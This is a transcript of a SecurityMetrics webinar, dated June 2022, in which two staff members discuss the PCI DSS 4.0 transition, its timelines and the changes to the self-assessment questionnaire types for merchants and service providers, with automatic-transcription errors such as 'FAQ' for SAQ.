Watch to learn aboutthe timelines for compliance to PCI DSS 4.0 and the key requirement changes to the various SAQ types.
SecurityMetrics Principal Security Analyst Michael Simpson (CISSP, CISA, QSA) and Director of Program Management Scott Robinson will discuss:
Check out the Shopping Cart Monitor Demo
Learn more about Ecommerce Security Solutions
Need more PCI DSS version 4.0 resources? Check out our recent webinar PCI DSS 4.0: What Is New And How It Affects You
This webinar was given on June 28, 2022.
Welcome everybody to our webinar today. We're gonna be discussing the, PCI DSS four point o questionnaires. We are very excited to have Michael Simpson with us here to discuss this information and go through this. And so we hope you are ready to learn something about PCI four point o and what's gonna be coming up. Hello, Mike. How are you doing?
Good, Scott. Thanks for having me on.
Oh, it's nice to have you here.
We appreciate you taking time out to speak with us. So, let's talk about four point o. I know there's a lot of discussion about four point o. People are a little nervous about it. It's been a while since we've had a new release update.
What can you tell us about the release dates, the implementation dates, the things that are about to affect us?
Yeah. So I guess the first thing is don't be too nervous. The the four point o is out. This the self assessment questionnaires are available. People can do a self assessment, using the four point o version of the PCI DSS, but they don't have to. Version three point two point one is still active until March thirty first of twenty twenty four. So between now and March thirty first of twenty twenty four, you can kinda choose whether you wanna do a a three point two point one assessment or a version four assessment.
Once we pass March thirty first of twenty twenty four, the three point two point one standard will officially be retired, and and four point o will be the only option at that point in time. But even when we get to that point, any of the brand new requirements that were brought in as part of this transition to four point o, they'll still have another year until March of twenty twenty five before the new requirements are not just best practice. So we we've got some time. People don't have to worry too much about the fact that four point o is out. They can still use three point two point one for the next couple of years.
And even after they have to transition to four point o, they still have another year for those new requirements to get in place. But it is time now to start preparing for sure.
Oh, definitely. It's it seems like in the past when we've had release dates, it's kind of followed the same pattern. They released it. They gave you an opportunity to start looking at you could go down that path or you could wait and go down the next.
But once that hard date hits, it's that or nothing else. Right? So Yeah.
And I think because of the significant change that came with four point o, we're actually given more time than we have in the past for a transition. So this this transitional period is quite long.
Having three years to get these new requirements in place, we, there's there should be plenty of time for organizations to take a look at the requirements and to figure out the best way to implement those in their environments, before they become mandatory.
Fantastic.
Is there gonna be scoping changes with four point o to merge?
There really isn't much in the in the way of scoping changes.
The the scoping guideline that was, put out by the council a few years ago is is still pretty much accurate.
The the devices that are in scope are still devices that are processing, storing, transmitting credit card data, or that can affect the security of credit card information.
So scoping is pretty much the same. In the SAQA, there is and this is a little bit different than scoping. But when when people are doing self assessments, usually, they're they're scoping their environment, but they're also going through the qualifying criteria in the self assessment questionnaires to identify which SAQ applies to their environment.
There was in the SAQ a a minor modification to, those qualifying criteria, but it really doesn't affect scope. It it just makes it more clear that any of these SAQA providers, which are typically, typically ecommerce, but it can be like call centers. Anytime when they're fully outsourcing all of their collection and processing of credit card data to a third party provider. The in four point o in three point two point one, it says that those third parties need to be PCI compliant. In four point o, they've gone just a little step further to say that in order to qualify to assess using the SAQA, you need to have a valid AOC or attestation of compliance from each of those third party providers.
But other than that, it really doesn't affect scoping. It's more just new, there are some new requirements that have come in with version four, and then they've also enhanced some existing requirements.
Fantastic. Well, let's go through some of those changes. So what are the key changes there?
One of them I that affects all of the FAQs, you know, regardless of which one you're filling out, there is a new checkbox. So in the past, there was, you know, for each requirement, you would either say it's in place, which means that control is active and and, you know, in your environment, you guys have that in place.
There was a so that was a yes. There was a no checkbox saying that that control is not in place, and, thus, you're not PCI compliant because of that. There was a NA or not applicable, and there was a in place with compensating control, which basically means, you know, I do I'm meeting the intent of this requirement, but I'm doing it in a little different way. So instead of doing it the way that was prescribed by the self assessment questionnaire, I'm meeting the intent of that by doing a different control.
SAQ four point o has added one, a checkbox that says in place with remediation, and this might cause some confusion, for some merchants that are self assessing. Basically, what that means is if when you were doing your self assessment and you came to a control and you found out that that was not in place and you were not PCI compliant, if you've then fixed that control or, you know, implemented that control or or took care of whatever remediation work needed to be done to be compliant, then they want you to mark the in place with remediation. And there's a a table down in in the appendices where you would mark, you know, which item was not in place when you first did your assessment and what work was done to bring that into or bring that into compliance with the standard. So that's one change that we'll see on all of the FAQs.
Okay. And oh, go ahead.
No. No.
Just just what most people are gonna ask us, we hear this from merchant side all the time, is is Mhmm.
How many more questions do I have to answer here? Am I gonna have to answer a bunch of them? Is there more?
Is there less?
What is the question. And and I I went through it took a while counting all of these checkboxes. But for with the with the exception of the SAQA, actually, there's fewer checkboxes you're gonna check-in four point o than you are in version three. So, for example, the SAQ p two p e in version three, there were thirty three checkboxes that someone would have to go through and say whether there was in place, not in place, or not applicable in order for them to finish their assessment. In version four, that's gone down to twenty one.
So most of them has shrunk quite a bit. The SAQD had three hundred and thirty one checkboxes.
Right.
The SAQD in version four point o has two hundred and fifty one. So we we've seen a significant reduction in the amount of checkboxes. But as I've gone through those self assessment questionnaires, most of the reduction is not the removal of requirements, but they've combined a lot of, requirements into one checkbox. And that was particularly true in in relation to policies where PCI would say, you know, you must have a policy for x, y, and z.
In the past, they would have a specific checkbox for each of those policy elements. Now I've noticed in four point o, a lot of those have been combined into one checkbox. So you still have to have those same policy elements, but you're just checking one box to say yes. All of those policy elements are in place.
Which makes it So for most of them, there will be fewer checkboxes.
Right. And every that's, you know, that's always been the big concern for everybody is how many how many checkboxes do I have here? How many different things do I see? It it felt like there was a lot of duplication in prior ones. And so this will feel comfortable for merchants that are having to do this, to not have to to have quite so many questions to to mark up and go through, which is nice.
Yep. Now The one the one exception to that is, like I said, the SAQA, and and we have a lot of SAQA merchants because it it is really, in the past, one of the the sweet spots, I would say, for merchant compliance because you're basically outsourcing all of the collection and processing to a PCI compliant third party. So your your risk level is lower. But because most SAQA merchants are ecommerce merchants and they're, you know, they've got some website where they're, you know, selling products or services, but before payment's taken, they're either, you know, redirecting their customer to a third party to collect that information or they're implementing, like, a third party iframe to collect it.
But because of the skimming attacks that we've seen over the last few years, the ecommerce skimming attacks, the SAQA has added several both new requirements that have come in with PCI version four and some existing requirements that were not part of the SAQA in the past, like the external vulnerability scans or the ASV scans. It's not a new PCI requirement, but it is new to the SAQA for version four. So that one, you know, we had the twenty four requirements in the past. We now have thirty one requirements.
And there there are some added there there's more, inspection that's being performed on those ecommerce websites that are not touching credit card data, but they're affecting the flow of that credit card data.
Awesome. Awesome. So security is is really important in these. Right? They're they're boosting that security. What other what are what are the sections within the SAQA that are are being added to that that help with that security?
Yeah. So other than the the external vulnerability scan, and that that's one that I would recommend merchants get on right away. Because unlike some of the new requirements in version four, version four has a couple of s a or new requirements, like, let's see.
Requirement, six dot four dot three and eleven dot six dot one. And those requirements are specifically designed to protect either the iframe from being tampered with or designed to prevent, third party code that's being included in your page from causing security issues on the website.
So those those new requirements, like I said in the beginning, we have until twenty twenty five before those are not just a best practice. Right. But when they take an existing requirement like the ASV scan, as soon as version three two one is retired and we can no longer do an SAQA version three point two point one, that requirement needs to be in place right then. So, you know, that is the March twenty twenty four date that we're hitting for some of these requirements. So we've got the ASV scan requirement. If you don't already have ASV scans, SecurityMetric can help out with that.
But then we've also increased a lot of the authentication requirements. You know? So there were some authentication requirements in the past in the SAQA, but those have expanded. So now requirement, eight point three point five in version four.
This is another existing requirement that was pulled in, and it deals with, you know, when you're setting up a new user account. So this would typically be you're setting up a new admin account on your e commerce server. You know, what's the process for setting up that first time password? Do you require the user to reset their password upon first log on?
If someone forgets their password or gets locked out, you know, what's your reset process? So these are existing PCI requirements, but they haven't been part of the SAQA in the past, and they now are.
Addition to that is, like, the password history requirement is, you know, how many passwords does your system remember so that people aren't reusing old passwords.
SAQA.
And then also in a you know, with passwords that either you have to then the sorry. The password age requirement has been added. So in the past for version three two one, again, it wasn't part of the a, but if you were an SAQC or a BIP, there was a requirement that after every ninety days, you've gotta reset your password.
Right.
That ninety day requirement's been brought in, but it it's a little bit different than it was in version three two one. In version four, you either have to change your password every ninety days or you have to have some other form of authentication other than just username and password. So if someone's already implemented MFA or multifactor authentication Right. On their ecommerce server, they don't have to change passwords every ninety days in version four point o.
Right. So those are some of the the requirements. Mostly, what they're trying to do is increase your your authentication security on these ecommerce redirect servers. And then the the other, requirements that they've added, deal with how to protect any third party, either the iframe that's being implemented or or any other third party code that you're implementing on your on your ecommerce site.
Got it. Got it. So are there any other, big changes to the other FAQs?
Really, the rest of them I mean, the the FAQ b, the BIP, the p two p e, they're relatively unchanged. You know? There there's some minor modifications, but if if you are going through any of these FAQs prior to version four, going through a version four s you know, self assessment is really gonna look a lot the same. The the formatting looks a little bit different. Like I said, there's fewer checkboxes, but what you're actually required to do is basically the same.
The the CVT and the c and the d, so are are more complicated ones. We do have some of these new PCI version four requirements that have made their way into those, self assessment questionnaire. So you will see some differences in our more complex, FAQs. Right.
The biggest difference for our complex FAQs is if you're a service provider you know, our our merchants, they have, you know, this alphabet soup of FAQs that they can choose from. You know? The the a and the b, the c, the CBT. But a service provider, they they've only ever had one.
You know? There's the SAQD service provider, and it's still the same. The SAQD service provider, that one is substantially different in version four. And they treat it almost like doing a rock assessment.
Instead of just checking a box when you're saying, yes. This is in place. You have to actually type in what you looked at to verify that that control was in place. So much more like what someone would go through if they were doing a full rock assessment against their environment.
Usually, their QSA comes in, performs the assessment, and when they're writing up the report, they say, you know, to verify this control was in place, this is what I tested, and this is what I looked at. The SAQ has never asked for that level of detail. But in version four for service providers, because they are held to a higher standard, they they are being asked to provide details as to what they looked at to verify that they are PCI compliant. So that will be a significant change for our service providers.
K.
Okay. But the SAQA, which is probably one of the most common SAQs we have out there, b is the other one. B seems to be, a big one still in the in the industry.
Relatively unchanged in b. BIP, same relatively unchanged. We're not dealing with a lot of changes there to cause merchants any pain or No. Confusion. Mhmm.
C and CVT have always been kind of the ones that that merchants have, struggled over. Even our our partner banks have struggled a little bit of the understanding between c and CVT, SAQ.
And and typically, that's all about segmentation in there for merchants that use a virtual terminal especially, right, where the CVT comes into play.
And so not many changes there. I'm I'm I'm hoping.
Yeah. I mean, from from a the qualifying criteria, basically the same. So if you were a CBT in the past, you'll still be a CVT in version four. But but there are some minor changes.
You know, they have brought in some new requirements that weren't there before for version four in the in both the c and the CVT. So there there there is some new, validation that will have to be performed if you're doing a version four assessment versus three two one for either the c or the CBT, but not nearly as, you know, it hasn't changed nearly as much as, like, the the d and the the SAQ AEP. But the c and the CVT, they have had both similar to the SAQA, both some existing four point o requirements that were not part of that SAQ in the past have been added. And then also some, you know, some of the brand new four point o requirements that are best practice until twenty twenty five are also in the c and the CVT.
So there will be some changes in those. So if if you are a c merchant or a CVT merchant, it would be worth your while to to take a look at those FAQs and identify what those changes are so you can start working to prepare for for a version four assessment.
Oh, perfect. Another question that just struck me was the SAQ VIP.
VIP is in that kind of funny situation where you got a terminal. It's connected by an IP.
Are they still looking to make sure that merchants are segmenting that from everything else in their network?
Or They still are.
They still are.
Yep.
Okay.
Yep. So it's still one of the qualifying criteria. You know, this is, that device should be behind a firewall. It should be segmented.
Only allow traffic that's required both inbound and outbound, and and it should be you know, it shouldn't be on the same network segment as any of your other devices.
Wonderful. That's always a question that kinda pops up when we're talking with our partners is is, the VIP is yeah. That's an an IP enabled terminal, but also has to have this other set of security involved. Right? The segmentation is a big piece. And if they don't have that segmentation, of course, it throws them into SAQC.
And that always, frustrates, should we say?
Much more complicated.
Yeah.
It's a little more complicated. It's a little more frustrating for everybody to see that. But it's the understanding that that security is everything. Right?
Yes.
That's really what we're trying to make sure.
One thing that I've seen with a lot of my merchants that don't wanna fill out an SAQC and they're using one of these terminals, a lot of them have moved to to validated point to point encrypted terminals because those they can connect to any network segment they want. They could even connect to their Wi Fi network, and it it doesn't bring that network into scope. And we even see now some banks are providing p two p e validated terminals to their merchants.
Right.
So so that's something to look at. If if you, you know, if you want an IP connected terminal, but all you have is that bank provided terminal, see if your bank has a validated point to point encryption solution that you could implement. It could definitely reduce the scope of your assessment and make filling out your SAQ much simpler.
Oh, guaranteed. I mean, even BIP, four point o is gonna have forty eight questions. Right? And Mhmm. P two p e has twenty one, and so already you're reducing that. And and still no scan involved with p I, BIP or sorry. P two p e?
With p two p e. Yeah. There's no there's no vulnerability scan required.
Right.
For VIP, there would be. So so, yeah, if if you wanna reduce those requirements, if you can implement point to point encryption, for those terminals, you'll you know, it reduces your risk and then also reduces your compliance burden.
Right. And now the the only scan change, it sounds like, is SAQA because prior, SAQA didn't have a scan. It wasn't wasn't a requirement.
Yep. Four point o will throw that scan in place. But the rest of them, nothing has changed in that manner. P two p e does not have a scan. B does not have a scan.
CBT does not have a scan. Right? BIP will, c will, AEP will, and, of course, d and DSP will.
Yep. Yep. That is right.
Fantastic.
And one surprising thing to me that even with the SAQA, they've added the external scan or the ASD scan.
They're still not requiring an internal scan. I'm not sure why they didn't add that requirement in, but maybe because they felt like they were already throwing enough at the SAQAs for for one change.
Right.
So right now, just the external scan is required.
With with all of the SAQs, there is, you know, a statement in there that says that even though you're only attesting to, you know, this small subset of the full standard, you should be compliant with the full PCI standard. So any requirement that does apply. So so I would recommend our SAQA merchants do both internal and external scans even though they're only having to check to, you know, attest to the fact that their external scans are in place.
Right. Now let's talk a minute about internal scans because it seems like with most of our merchants, and most of our partners, they they they aren't quite sure what the internal scan is. There there are companies out there that are touting their external scan as an internal scan.
Mhmm.
Give us a little idea about the importance of that internal scan and what that means to the merchant and what what security that provides.
Yeah. So for for years, the industry has recommended, security kind of in levels. You know? So so you have multiple levels of security or multiple layers of security.
The the external scan is a a vulnerability vulnerability scan from the Internet.
So we're seeing, you know, if someone was in their basement, what vulnerabilities would they be able to see on your server or your systems and potentially exploit?
An internal scan takes you inside of your firewall. So you're you're losing some of that external protection, and it'll let you know if someone were to gain a foothold inside of your network, what additional vulnerabilities would there be on that server or system to exploit, you know, from that internal perspective. Right. So the internal scan, you get a much more in-depth look at really what what vulnerabilities the system actually has, because the external scan is gonna be blocked by, you know, that firewall or that, you know, network segmentation device. So the so the internal scan doing both an internal and external scan will get you a much clearer picture of what vulnerabilities you actually do have in your environment, your systems, so you can address those to to protect those systems from being or those vulnerabilities from, causing your system to potentially be compromised.
Right. And we see in today's world that, almost everybody's hackable in in some way, shape, or form. And so, preventing the outside entrance in is wonderful. Right?
Deadbolt that baby. Make sure they can open that door and get through. But if they do get in, it's nice to know what other sets and systems are in place to to stop them from progressing forward. Right?
Yeah.
Unfortunately, we've seen so many times, data breaches caused by someone gaining access to what might not be considered a a critical system, but it puts them in the inside of some of those external protections. Right. You know? So so that's really why the internal vulnerability scan provides a lot of, value for customers, or for merchants is is they can see, you know, if even if I had a failure of my external security devices, where, you know, if I've secured properly internally, then then it should prevent that type of a a compromise, you know, or that type of yeah. If if someone does get a foothold in your network, it it'll prevent the amount of damage they can do once they're inside.
Right. So where you've gone out and done these audits and seen this these issues come in, how often is a hack that happens and somebody gets a breach, does it would it have been, lessened? The effect would have been lessened had their internal security been a lot better.
Is that you know, that's a good question.
That's probably a better one for our forensic team because they actually go in after there's a breach.
I'll I'm luckily on the team that helps prevent our customers from finding out that information Right.
Because we help to protect them from ever having that that data breach or that, you know, data compromise.
But, you know, all of PCI, the the data security standard has, a lot of preventative controls, that would help to prevent that type of a system or that type of a compromise from happening. And then they have detective controls designed to help you detect when something has gone wrong so you can respond to it quickly so that there's, you know, less damage to the organization, less data can be, stolen during the compromise the window of compromise. So, I I definitely think the the more hardened you are both from an exterior standpoint and in you know, within, your, all of your systems internally, the harder it's gonna be for someone to, you know, continue to exploit systems within your network. The it'll minimize your the damage that that could be performed, and it'll give you more time to respond to that type of an intrusion to be able to to shut that down before any critical data is taken. So at least that's the hope. That's the whole security in layers.
You you don't wanna put all of your eggs in that external firewall because someone inevitably there'll there'll be some, you know, zero day vulnerability, something that will allow someone past that external device.
And you wanna be sure you're protected on the inside as well.
Well, I'm assuming good new news travels fast within the the hacker community once somebody figures out a vulnerability. They are sharing that just as fast as we are sharing the fixes to stop those vulnerabilities from happening.
Yep. And and, unfortunately, sometimes it's when, you know, the the fix is announced. Hey. There's a patch here that the hackers go, oh, there's a hole there then.
You know?
Right.
So so if if a company doesn't have a good vulnerability management strategy, you know, it really puts them in a bad situation where now we have much more data about vulnerabilities, and hackers can start, you know, creating tools to exploit known vulnerabilities. If if you don't have a good vulnerability management solution, you kinda you're you're just opening yourself up to to attack.
Right. Right. And it's almost that that feeling of once you hear about it on the news, it's almost too late. They know it. They're working it, and you're you're set. You've got that much more time, you know, that they're they're the likelihood of them coming in that door is greater. Right?
Yeah. Yep.
Fantastic.
Well, Michael, I appreciate that that it's always a pleasure to have you here and explain things and make it easier for us to understand it as we go through. I know four point o is sitting out there on the horizon. People are a little nervous about it. We've heard little bits.
We haven't heard enough yet. And and so this is a perfect a perfect opportunity to get a better understanding of what's coming our way and what to look out for and what to that it's not all bad news. I mean, the fact that the FAQs are going down in questions is wonderful. Right?
Yes. For for most of us, it's a great idea that, we don't have to to answer as many questions and spend our time doing PCI. But yet if we we follow what the PCI standards are are asking for in in these filling out these questionnaires and using them the way that we're supposed to use them. We tighten up that security less opportunity for breach as we Yeah.
As we continue to do business.
And from what I've heard, that's kind of what they were going for with four point o is is make it the paperwork side a little easier and focus a little more on the security side. So, hopefully, that's kind of where we see it, you know, as as merchants and service providers. You know, take an opportunity to to really tighten up your security, but maybe not spend as much time checking boxes.
Right. Right. Well and and and sometimes when there's so many boxes to check, it becomes an exercise of checking those boxes rather than really putting in that security in place to protect our systems. Right?
Yep. And so any anything that we can do to kinda change our focus from from checkbox exercise to real security makes a big difference down the road for us. Well, thank you everybody for joining us on this webinar. We're excited that, we had a chance to talk with Michael and learn about four point o and what's coming up.
We're gonna hop over now into the questions part of this webinar and and see where we at from there.
So first question, can I use a customized approach for SAQA?
The customized approach, this is where, the customized approach is really only meant for large organizations have a mature security setup. And if if they have it's almost like compensating controls on steroid. So they they can say, you know, we meet the intent of this, but we're gonna do it a different way. For them to do a customized approach, they work with their QSA to define testing procedures. So they say, this is how we meet it. And the QSA comes up with their own testing procedures to validate that what they're doing actually meets the intent of the requirement and that they're following that.
None of the FAQs can use the customized approach.
When should we start working on four dot o? O?
That's that's always a great one. I mean, you can it it doesn't hurt to get started on it early if you're not afraid to get in and get started. Matter of fact, I think the difference between this this four point o SAQ and three point one, people waited to do three point one until they absolutely had to do it.
In this case, there's a shorter amount of questions to have to answer.
I would tell you, don't be afraid to jump in and get started. Right? That's the way I would go.
What do you think?
For sure. Yeah. No. I would agree. It it's never never too early to start, at least looking at what four point o will look like for for, you know, your merchant environment.
For a lot of our SEQs, very little differences. For some of them like the SAQA, there are some differences, but now is definitely the time for them to start looking at those additional controls and start to get those in place.
Right.
So, yeah, I think that'd be great.
If I submit a PCI version four dot o s a q, do we have to follow those future dated requirements?
Future dated requirements, until twenty twenty March thirty first twenty twenty twenty sorry, twenty twenty five. Those future dated requirements are considered best practice.
So you should have those in place. You should be working on those if you don't have them in place, but but you're still compliant even if they're not in place up until twenty twenty five.
K. So what tips or best practices do you suggest for getting ready or started for for PCI four dot o?
No. In thinking about it, from my side, it's it's all about the the the lack of time it's going to take to fill out that SAQ.
So from my from my standpoint, I would say get started as soon as it's available to you. That makes the most sense. You got better security practices involved. You're gonna be tighter in your security.
It isn't like when we went from three point o to three point one and three point one to three hundred. Right? Those tended to be a little harder, and it tended to have some consequences in in a different manner for more questions to answer. This one seems a lot simpler just for the reduction of questions alone.
Makes me feel like, why wait? If it is available to you, take it and run with it.
Yeah. No. I I would agree. The the one caveat I would put is for some of our SAQs, like the SAQ a, the AEP, the CCBT, there there are going to be some of the, you know, existing PCI requirements that have been newly added to those SAQs.
So if you look through the SAQ four point o and those new newly added requirements that are not future dated are not currently in place, then, obviously, you know, you can't really do a four point o SAQ, and be compliant until those become in place. So so now is definitely a time to look at that. You know, how would performing an SAQ four point o affect me? Are there any security controls that need to be in place that I currently don't have in place?
If there are and you need to, you know, provide that validation to your bank, go ahead and, you know, take the opportunity to still use three two one while it's while it's here. Mhmm. But start working on those newly added requirements and make sure you can mark in place on all of those.
Next question. Will the SAQ document look different in four dot o versus three dot two dot one?
It's gonna look a little bit different, but but not substantially different. I mean, we we still have the qualifying criteria section. There's still a place where you put your contact information. The formatting's a little bit different. Like I said, there are fewer checkboxes, so they they've consolidated, some of the requirements all into one box where in the past, there were multiple boxes you were selecting.
But it's still basically formatted, you know, the the same way as it was in in three two one. So if you were familiar with how to perform a self assessment in version three two one, version four point o is not that big of a stretch.
Next question. When will SecurityMetrics update their portal so that we can submit a four dot o SAQ?
That's a great question. I know we're currently working on that today, making sure that we can do some of the most simplified pieces of this. It's one of the things that Security Metrics has always done is try to simplify this process for the merchant. In years past, anytime there was a change to an SAQ, we looked for, ways to take you from one SAQ to the other.
And if the questions were the same, we could prepopulate and bring it over and have it match up and and leave you less questions to try to answer. So we're currently working on that today to make sure that when this is all done, when you make that switch over to four point o, if there's pieces of the SAQ that you've answered already and there's an exact match to that, we can bring it over. We're gonna bring it over and simplify that for you. And so I'm sure we'll be ready when when the as it gets closer to release time and being out there for everybody.
But, we've always we've always been early as I think about that. We've always been up and ready prior to the the actual start up, and so I expect no difference for this one.
For requirement eleven dot six dot one, what even is this requirement, and which FAQ types need to worry about this?
So eleven dot six dot one, this deals with protecting those payment iframes. So if if you've implemented an iframe on your e commerce website so this is going to affect mostly our SAQAs. I believe the SAQ AEP, and it'll it'll be in the SAQD as well.
But there are controls in place to prevent, tampering of the HTTP headers.
So that it it's kind of a very technical requirement. It's something that you're going to have to there there are some recommendations that the council gives in the PCI DSS four dot o documentation for how to become compliant with requirement, eleven dot six dot one, but this is mostly going to affect our ecommerce merchant types.
How can we determine which s a q type we are?
Oh, that's a great question.
So you have a couple of different methods of getting scoped today, for us, anyway, SecurityMetrics here. You can call in and talk to a consultant who will walk you through that process. They'll ask you all the questions that you know, scoping questions that get down to what SAQ belongs to you. We also have a tool called FastPass that, will do the same thing. Typically, they're customizable for partner banks, so we simplify that process greatly.
We also have a third tool called SMXpert that allows you if you have multiple processing methods that will also scope you and get you into the correct questionnaire.
Each each scoping process is mainly designed to get you into the questionnaire the correct questionnaire with as little chance of of going down the wrong path.
FastPass allows us to do a little bit more than that. And so that allows us to pre answer some of the SAQ as we go along, and that makes it a little simpler for you as you go down that path.
What are some of the biggest changes in four point o for service providers?
Yeah. The the biggest change for service providers, and we we talked a little bit about this, earlier on, is the fact that instead of just checking a box, you're also going to have to write in your SAQ, you know, answer how you verified that that security control was in place. So this is gonna be much more intensive of an exercise for our service providers.
Hopefully, all of the requirements that that that do apply to them, they'll be able to mark in place, but then they have to go in and say, you know, these are the systems I looked at to verify that these controls were in place in my environment. So so it is gonna be a lot more work for a service provider to fill out an SAQD in four four point o than it was in three two one.
And for merchants, they they tend to struggle. I I sell tennis shoes. I provide a service. I'm a service provider. Right?
We see that a lot.
What's the best way to explain the difference of someone providing a service and a service provider?
Right. So a service provide it really deals with who holds the merchant account. You know? So if if you're selling shoes and someone when they purchase your shoes, they're you know, they they pay with a credit card. That money goes directly into your bank account, then you're a merchant.
If you're helping merchants perform those operations, then you're a service provider. So I think that's the biggest one is who holds that merchant account.
If if you help merchants by, you know, managing their firewalls or managing, you know, their ecommerce servers, but the money from the customer doesn't go into your bank account. It's going into your customer's bank account, then you're a service provider.
Perfect.
How have the changes for risk assessments changed in version four dot o?
Yeah. So probably the biggest change that I've seen for risk assessment, In in version three point two point one, the risk assessment, it had to be done annually, and it should be based on some industry accepted risk assessment process. And they and within the ROC, it it recommended a few risk assessment, formats that you could follow. But outside of that, there wasn't really a lot of detail that was provided other than it had to happen at least once a year. In version four point o, they're relying on the risk assessment for a lot of the other requirements.
And, usually, any requirement that uses the word periodic, the risk assessment gets tied into that. So one requirement, that comes to mind for that is for merchants who have, any type of device that handles card present payments. So the the, you know, these payment terminals that are actually physically interacting with the credit card, they're required to perform tamper prevention inspections on those on a periodic basis. But the question's always been, well, what does periodic mean for me?
And now the council's like, you know, this is up to your, you know, based on your risk. So your risk assessment should determine what periodic means. So so there are a lot of requirements where they tie back into that risk assessment requirement where, you know, you do have to do a risk assessment. It has to be done at least annually. But those risk assessments should be looking at things like, you know, how often am I performing tamper inspection, reviews on my terminals. One of the other ones is, you know, when it comes to antivirus.
In the past, if you had a system that was determined to be, you know, not where where viruses weren't really applicable to that type of a system, so maybe you you felt like requirement five didn't apply.
You know, your risk assessment needs to review that on, you know, you need to periodically look at that from a risk assessment standpoint. So there's several places within the the PCI standard where it will tie back to your annual risk assessment. So if you're currently doing a risk assessment for PCI, in PCI version four, you really shouldn't be looking at all of these additional requirements that tie back to the risk assessment and make sure your risk assessment is covering all of those requirements.
That's a great question.
Have requirements changed surrounding documentation?
There there have been some, changes to documentation. One of the things that I like about the structure of version four is at the beginning of each requirement, there there's a a requirement that shows that you have, you know, policies and procedures in place. Like, for requirement one, we're we're dealing with firewalls and network devices.
So the very beginning, we have a requirement that says we have policies and procedures, and we know what staff members or which groups within our organization are responsible to maintain the security of these devices. And those people have a copy of our policies and procedures. And you'll see that in every section. You know?
So, like, requirement three deals a lot with how I'm protecting credit card data at rest. If you're gonna at the very beginning, you need to show that you've got policies and procedures in place. You know who's in charge of making sure that that data is protected arrest and that they have a copy of those policies and procedures. So it it's just much more structured than it was in three two one, where, you know, three two one, it did, and it was usually right at the end of each requirement.
We had a state, requirement that said, you know, we do have policies and and the people have a copy of these policies. But here in version four, we need to specifically identify what individuals or groups are responsible to maintain, you know, those requirements that deal with that section and to verify that they have and are aware of the policies and procedures that apply to maintain compliance for for that piece of their environment.
For an ISO, when should we look into focusing on pushing four dot o to our merchants?
Oh, I think that's, I think every ISO and every everybody's got the opportunity to jump on this one as as early as they can or as late as they want to.
Like you said, there's a cutoff time. And at that cutoff time, if a merchant isn't hasn't completed their SAQ, then it could be a little painful to shove them over into four point o. We're gonna do everything we can to help you get to that point by by bringing over some of those answers and putting them into four point o if they if they'll match up correctly.
Otherwise, you take that inherent risk of waiting to the last minute, and it could cause a little more pain for that poor merchant to get through that again. So it's to me, it's always the sooner the better as as as long as you feel like they can get in there and get it get it done.
When will the SAQs change again? Is this going to switch a year after I finally get compliant?
Let me look at my crystal ball on this one. No.
We we never really know with with PCI DSS.
In in verse like, from version three point two or version three to three two three two one, there were several fairly quick changes, and it dealt with some newly discovered vulnerabilities mostly surrounding transaction, transmission encryption, so like TLS vulnerabilities and SSL vulnerabilities.
So we did have some significant changes fairly quickly.
Usually, the PCI DSS standard doesn't change that fast. And from three two one to four o, it's been quite a while Right. Since we've had a change. So I I don't think the council is expecting any significant changes happening anytime soon.
But the fact that we still have, you know, two years before three two one is officially retired and another year before the new four dot o requirements come out, a lot can change in that time period. So if there are significant changes to the risk landscape, then I'm sure the the PCI council will come out with new requirements to address that additional risk. So it really all depends on on what risk we're seeing and what risks our merchants are facing. If if we need to address those risks, I think the council will move on those.
If if the risk is staying fairly static, I I don't think there's a desire to do a lot of changes rapidly. So I I do think they feel comfortable with where the standard is now.
And I and I I don't expect a lot of big changes. So I think if you're ready for four point o, you'll probably be in a in good shape for for a few years, but we really don't know. We'll have to see.
How long will four dot o requirements take to implement specifically for an SAQA or SAQA EP?
Yeah. So how long they take to implement is really just dependent on the merchant or service provider environment. I mean, as for the AAEP, we're just talking about merchants.
For and for the SAQAs, I I deal with merchants that, you know, they have all of their systems are fully outsourced. They don't have their own website that redirects to a third party. Everything starts on a third party website. So for some of you, you know, getting compliant with four point o could be a piece of cake. You might be already compliant.
For others that have more of an extensive, ecommerce platform that they manage themselves that, you know, either redirects users to a third party for payment collection or implements an iframe. You know, that those changes may be fairly substantial, but it's really based on, you know, how your, card data environment is is configured and what type of resources you have. So so this may be trivial, or it may take you a couple years, but it it really depends on the on the merchant environment.
Will SHUs ever go away?
Mm-mm. Mm-mm. I don't I don't know if we can answer that. Right.
I think there's been a lot of talk in the past about, PCI is is gonna go away, but I don't think it's ever gonna go away necessarily.
Yeah. I well and I guess early on during the development of four point o, there was a talk about moving from the FAQs to a different, assessment form. I think it was called the MAS.
Yeah. The math.
But that was yeah. So they they've hold back on that. Whether that'll come back, we we really can't say. That would that would be another crystal ball question that would be a better directed at the council, so we'll have to see. Yeah.
And the reality is it was just a a different way of saying self assessment questionnaire was merchant, you know, merchant attestment form. Right? And so it was Right. It it wasn't really much different than a name change.
So we could have different acronyms coming out, but I I think there'll always be some form that people are filling out to attest to the fact that they are PCI compliant. Right.
Where can I find more information about FAQ updates slash, will you guys go further into the different FAQ types?
Yeah. So I I think the first place to go, Scott, correct me if I'm wrong here, is the PCI Council's website itself. So if you go into the document library, you can download all of the four dot o documentation. They also have a blog, that you could look at.
The next place to look at is Security Metrics. We we have a blog as well. We've already published a blog on the SAQA for four point o. We have one out for SAQ CVT for four point o.
There's webinars like the one we're on now, different podcasts that have been put, put out to help merchants and service providers get ready for four point o. So we'll continue to be providing information, and the council has said that they will continue to provide information as well as we make this transition.
Right. And it won't be long before the council puts them up that they can start downloading them and working on them and looking at them. So it's counsels usually the best place to go to see the document quickly and then look for other answers through, like you said, our podcast and our webinars and as we try to explain it.
K. Final question.
What sorts of tools does secure security metrics have that could help us with the four dot o transition?
Oh, those are great questions. We have lots of tools, for merchants. Probably the most common tools that are that are, purchased from merchants is or or merchants have picked up or part of their programs or policies, procedure documents, which are are always a little bit more difficult to sit down and and piece together.
It can be done, but it it is a lot more difficult.
We have of course, we do we have a scanning tool, so we'll we'll manage their scanning for you. We set all that stuff up to to happen on a quarterly basis, which is required by PCI, so that will happen.
Like I said, policy doc, procedures doc, trainings for your your merchants, or for your your employees to help them understand the best practices for handling credit card data.
Trying to think of the other off the top of my head.
One other tool I think that might help, especially with the SAQA, is our, shopping cart monitor tool. You know, that's specifically designed to help prevent these, ecommerce skimming attacks, which some of the new requirements that have come into the SAQA and the AEP are are there to help prevent these type of ecommerce skimming. So that's another tool of security metrics.
